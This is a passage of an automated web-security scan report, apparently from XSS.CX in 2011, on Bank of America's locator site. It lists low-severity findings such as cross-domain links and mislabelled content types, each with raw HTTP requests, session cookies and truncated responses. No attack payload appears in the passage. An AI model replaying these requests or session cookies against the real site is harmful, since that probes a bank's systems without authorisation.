searchPageState=%7B%22footprintMapAction%22%3A%22footprintMapAction%20('tx'%2C'o')%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2267337%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(1%2C'BC-8203'%2CLigeoAPI.getSearchResultsMap()%2Ctrue%2Cnull)%3B%5C%22%2C1000)%3B%22%7D

Response

HTTP/1.1 200 OK
Date: Wed, 29 Jun 2011 12:12:30 GMT
Server: Apache
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 156476
Content-Type: text/html;charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US
...[SNIP]...
</div>
<img src="https://shared.via.infonow.net/images//borders/lightGreyDivider.png" width="370" height="1" alt="" />

<div class="linkText">
...[SNIP]...
</a>

       <img src="https://shared.via.infonow.net/images/borders/dottedDividerVert.png" width="1" height="16" class="leftRight12" alt="" />


<div id="startANewSearchContainerOpen" class="startANewSearchContainerOpen" style="display:none;">
...[SNIP]...
<div id="startANewSearchContainerOpenBackground" style="display:none;">
<img src="https://shared.via.infonow.net/images/borders/startNewSearchInnerBox_Top.png" width="239" height="6" class="innerTop" alt="" />

<div class="startNewSearchInnerBox_BACK startNewSearchInnerBox_BACKCustom">
...[SNIP]...
</div>

<img src="https://shared.via.infonow.net/images/borders/startNewSearchInnerBox_Bottom.png" width="239" height="6" alt="" /><br />
...[SNIP]...
<br />
<a rel="nofollow" href="http://www.totalmerrill.com/TotalMerrill/system/ContactMLFindBranchOrFAModal.aspx?modal=findBranch" class="secondaryLinks">
Merrill Lynch locations
</a>
...[SNIP]...
<div id="addressBlock">

<img src="https://shared.via.infonow.net/images/mapicons/bofa_g3_green_center.png" width="31" height="36" class="floatLeft" alt="" />

<div class="displayTextReturn">
...[SNIP]...
<div id="searchResult1Cell1" class="resultIcon">


               <img id="resultImage1" class="resultImage" alt="1" src="https://shared.via.infonow.net/images/
   
       
       
           mapicons/bofa_g3_gray_np_01.png"/>

           </div>
...[SNIP]...
<div id="searchResult2Cell1" class="resultIcon">


               <img id="resultImage2" class="resultImage" alt="2" src="https://shared.via.infonow.net/images/
   
       
       
           mapicons/bofa_g3_gray_np_02.png"/>

           </div>
...[SNIP]...
<div id="searchResult3Cell1" class="resultIcon">


               <img id="resultImage3" class="resultImage" alt="3" src="https://shared.via.infonow.net/images/
   
       
       
           mapicons/bofa_g3_gray_np_03.png"/>

           </div>
...[SNIP]...
<div id="searchResult4Cell1" class="resultIcon">


               <img id="resultImage4" class="resultImage" alt="4" src="https://shared.via.infonow.net/images/
   
       
       
           mapicons/bofa_g3_gray_np_04.png"/>

           </div>
...[SNIP]...
<div id="searchResult5Cell1" class="resultIcon">


               <img id="resultImage5" class="resultImage" alt="5" src="https://shared.via.infonow.net/images/
   
       
       
           mapicons/bofa_g3_gray_np_05.png"/>

           </div>
...[SNIP]...
<div id="searchResult6Cell1" class="resultIcon">


               <img id="resultImage6" class="resultImage" alt="6" src="https://shared.via.infonow.net/images/
   
       
       
           mapicons/bofa_g3_gray_np_06.png"/>

           </div>
...[SNIP]...
<div id="searchResult7Cell1" class="resultIcon">


               <img id="resultImage7" class="resultImage" alt="7" src="https://shared.via.infonow.net/images/
   
       
       
           mapicons/bofa_g3_gray_np_07.png"/>

           </div>
...[SNIP]...
<div id="searchResult8Cell1" class="resultIcon">


               <img id="resultImage8" class="resultImage" alt="8" src="https://shared.via.infonow.net/images/
   
       
       
           mapicons/bofa_g3_gray_np_08.png"/>

           </div>
...[SNIP]...
<div id="searchResult9Cell1" class="resultIcon">


               <img id="resultImage9" class="resultImage" alt="9" src="https://shared.via.infonow.net/images/
   
       
       
           mapicons/bofa_g3_gray_np_09.png"/>

           </div>
...[SNIP]...
<div id="searchResult10Cell1" class="resultIcon">


               <img id="resultImage10" class="resultImage" alt="10" src="https://shared.via.infonow.net/images/
   
       
       
           mapicons/bofa_g3_gray_np_10.png"/>

           </div>
...[SNIP]...
</div>
<img src="https://shared.via.infonow.net/images/borders/pageSelectBottom.png" width="482" height="7" alt="" />


               <script type="text/javascript">
...[SNIP]...
<div class="footerOuterLeftPadding">

<img id="footerFold" src="https://shared.via.infonow.net/images//borders/lightGreyDivider.png" width="967" height="1" class="pushDown40" alt="" /><br/>
...[SNIP]...
<div id="map-copyright-div">

<a id="map-copyright"
href="http://via.infonow.net/map_terms.jsp?client=bofa&amp;tool=gen3locator"
onclick="window.open('http://via.infonow.net/map_terms.jsp?client=bofa&amp;tool=gen3locator','termsWindow','scrollbars,menubar=no,titlebar=no,height=280,width=500');return false;"
rel="nofollow">
All rights reserved. Use subject to License/Copyright.
</a>
...[SNIP]...
<div class="tripleBoxWrapper">
<img src="https://shared.via.infonow.net/images/borders/tripleBoxTop.png" width="476" height="7" class="pullTopDown3" alt="" />
<div class="tripleDivWrapper">
...[SNIP]...
</div>
<img src="https://shared.via.infonow.net/images/borders/tripleBoxBottom.png" width="476" height="7" alt="" />
</div>
...[SNIP]...
3.2. http://locators.bankofamerica.com/locator/locator/jsp/SessionTimeoutNotification.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/jsp/SessionTimeoutNotification.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /locator/locator/jsp/SessionTimeoutNotification.jsp?shouldTest=true HTTP/1.1
Host: locators.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://locators.bankofamerica.com/locator/locator/LocatorAction.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=FCD7363643DB9D12D507D043B5F3CED5.ftb-web1; testCookie=INFONOW_TEST_COOKIE_SUPPORT; WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; cmTPSet=Y; TCID=0007b046-77e2-485a-acb6-a45400000014; CMAVID=70121306499602161810121; SURVEY_VISITED_URLS_TRACKING_COOKIE=NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNYNNNNN; SURVEY_SHOWN_IN_LAST_6_MONTHS=Y; SURVEY_SHOW_DETAILS=CTS+Survey+for+ATM+BC+Locator+II%2C1%2C1; searchPageState=%7B%22mainSearchTextBoxFullAddress%22%3A%22document.getElementById('mainSearchTextBoxFullAddress').value%20%3D%20'10010'%3B%22%2C%22setShouldDoubleClickForNewSearchResults%22%3A%22setShouldDoubleClickForNewSearchResults(false)%22%2C%22showSearchFormFilters%22%3A%22showSearchFormFilters(false%2Cfalse)%3B%22%2C%22searchResultMapChangeEvent%22%3A%22void()%3B%22%2C%22prevSuccessSearchTextBoxFullAddress%22%3A%2210010%22%2C%22showStartANewSearchDropDown%22%3A%22showStartANewSearchDropDown(false)%3B%22%2C%22xsearchResultMapPinBalloon%22%3A%22setTimeout(%5C%22clickNumberIcon(1%2C'ATM-31691'%2CLigeoAPI.getSearchResultsMap()%2Ctrue%2Cnull)%3B%5C%22%2C1000)%3B%22%7D; TLTSID=4AC2E04CA18F10A1E19AC80568F5F3A8; TLTUID=4AC2E04CA18F10A1E19AC80568F5F3A8; NSC_CbolPgBnfsjdb=445b32097852; BOA_COM_BT_ELIGIBLE=No; session_start_time=1309296687564; state=MA; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; throttle_value=31

Response

HTTP/1.1 200 OK
Date: Tue, 28 Jun 2011 21:40:59 GMT
Server: Apache
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 9008
Content-Type: text/html;charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">
...[SNIP]...
</div>
<img src="https://shared.via.infonow.net/images//borders/lightGreyDivider.png" width="370" height="1" alt="" />

<div class="linkText">
...[SNIP]...
<div class="footerOuterLeftPadding">

<img id="footerFold" src="https://shared.via.infonow.net/images//borders/lightGreyDivider.png" width="967" height="1" class="pushDown40" alt="" /><br/>
...[SNIP]...
<div class="footerOuterLeftPadding">

<img id="footerFoldAbsolute" src="https://shared.via.infonow.net/images//borders/lightGreyDivider.png" width="967" height="1" class="pushDown40" alt="" /><br/>
...[SNIP]...
4. Content type incorrectly stated  previous
There are 4 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

4.1. http://locators.bankofamerica.com/locator/locator/images/searchInputGlow_home.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/images/searchInputGlow_home.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /locator/locator/images/searchInputGlow_home.gif HTTP/1.1
Host: locators.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://locators.bankofamerica.com/locator/locator/LocatorAction.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=F2480A35EBC4F2445BB8656B19222011.ftb-web1; testCookie=INFONOW_TEST_COOKIE_SUPPORT; WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; cmTPSet=Y; state=MA; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; TLTSID=4AC2E04CA18F10A1E19AC80568F5F3A8; TLTUID=4AC2E04CA18F10A1E19AC80568F5F3A8; TCID=0007b046-77e2-485a-acb6-a45400000014; throttle_value=31; NSC_CbolPgBnfsjdb=445b32097852; session_start_time=1309296047183

Response

HTTP/1.1 200 OK
Date: Tue, 28 Jun 2011 21:20:08 GMT
Server: Apache
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
ETag: W/"328-1306484098000"
Last-Modified: Fri, 27 May 2011 08:14:58 GMT
Content-Language: en-US
Content-Length: 328
Content-Type: image/gif;charset=ISO-8859-1

.PNG
.
...IHDR................1...`PLTE..................wwwiii......{{{...............|||..............................................
.....    vpAg.................IDATh.....0....D..M......``......
...[SNIP]...
4.2. http://locators.bankofamerica.com/locator/locator/jsp/keepAlive.jsp  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/jsp/keepAlive.jsp

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /locator/locator/jsp/keepAlive.jsp HTTP/1.1
Host: locators.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 29 Jun 2011 12:17:36 GMT
Server: Apache
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Content-Language: en-US
Content-Length: 3
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=ISO-8859-1

OK
4.3. http://locators.bankofamerica.com/locator/locator/onlineopinionOO4S/bg.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/onlineopinionOO4S/bg.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /locator/locator/onlineopinionOO4S/bg.gif HTTP/1.1
Host: locators.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://locators.bankofamerica.com/locator/locator/LocatorAction.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=F2480A35EBC4F2445BB8656B19222011.ftb-web1; testCookie=INFONOW_TEST_COOKIE_SUPPORT; WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; cmTPSet=Y; state=MA; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; TLTSID=4AC2E04CA18F10A1E19AC80568F5F3A8; TLTUID=4AC2E04CA18F10A1E19AC80568F5F3A8; TCID=0007b046-77e2-485a-acb6-a45400000014; session_start_time=1309296047183; CMAVID=70121306499602161810121; throttle_value=31; NSC_CbolPgBnfsjdb=445b32097852

Response

HTTP/1.1 200 OK
Date: Tue, 28 Jun 2011 21:19:48 GMT
Server: Apache
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
ETag: W/"492-1306484098000"
Last-Modified: Fri, 27 May 2011 08:14:58 GMT
Content-Language: en-US
Content-Length: 492
Content-Type: image/gif;charset=ISO-8859-1

.PNG
.
...IHDR....................    vpAg.........\6."....IDATx....M.@..a.kt.'...7......~.'v<..C.x....0...(........R..L.iz..3..o..J.C.qT......Q.X..=.8...Z.....S.c.......@...]..YG........qfdi.{.....
...[SNIP]...
4.4. http://locators.bankofamerica.com/locator/locator/onlineopinionOO4S/bgo.gif  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://locators.bankofamerica.com
Path:   /locator/locator/onlineopinionOO4S/bgo.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /locator/locator/onlineopinionOO4S/bgo.gif HTTP/1.1
Host: locators.bankofamerica.com
Proxy-Connection: keep-alive
Referer: http://locators.bankofamerica.com/locator/locator/LocatorAction.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=F2480A35EBC4F2445BB8656B19222011.ftb-web1; testCookie=INFONOW_TEST_COOKIE_SUPPORT; WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; cmTPSet=Y; state=MA; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; BOA_0020=20110628:0:O:d4887111-ca68-4745-8fa4fcccc29f4442; TLTSID=4AC2E04CA18F10A1E19AC80568F5F3A8; TLTUID=4AC2E04CA18F10A1E19AC80568F5F3A8; TCID=0007b046-77e2-485a-acb6-a45400000014; session_start_time=1309296047183; CMAVID=70121306499602161810121; throttle_value=31; NSC_CbolPgBnfsjdb=445b32097852

Response

HTTP/1.1 200 OK
Date: Tue, 28 Jun 2011 21:20:21 GMT
Server: Apache
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
ETag: W/"609-1306484098000"
Last-Modified: Fri, 27 May 2011 08:14:58 GMT
Content-Language: en-US
Content-Length: 609
Content-Type: image/gif;charset=ISO-8859-1

.PNG
.
...IHDR....................    vpAg.........\6."....IDATx...KN.1.EQ.......h    !......@(?....Z./.J:q.w...8.I..........|
....E... .V.........y.o,-.K*MN.[L.A......C....8Q..=.j..-<."H.o).=..\.4....C
...[SNIP]...
Report generated by XSS.CX at Wed Jun 29 20:17:40 CDT 2011.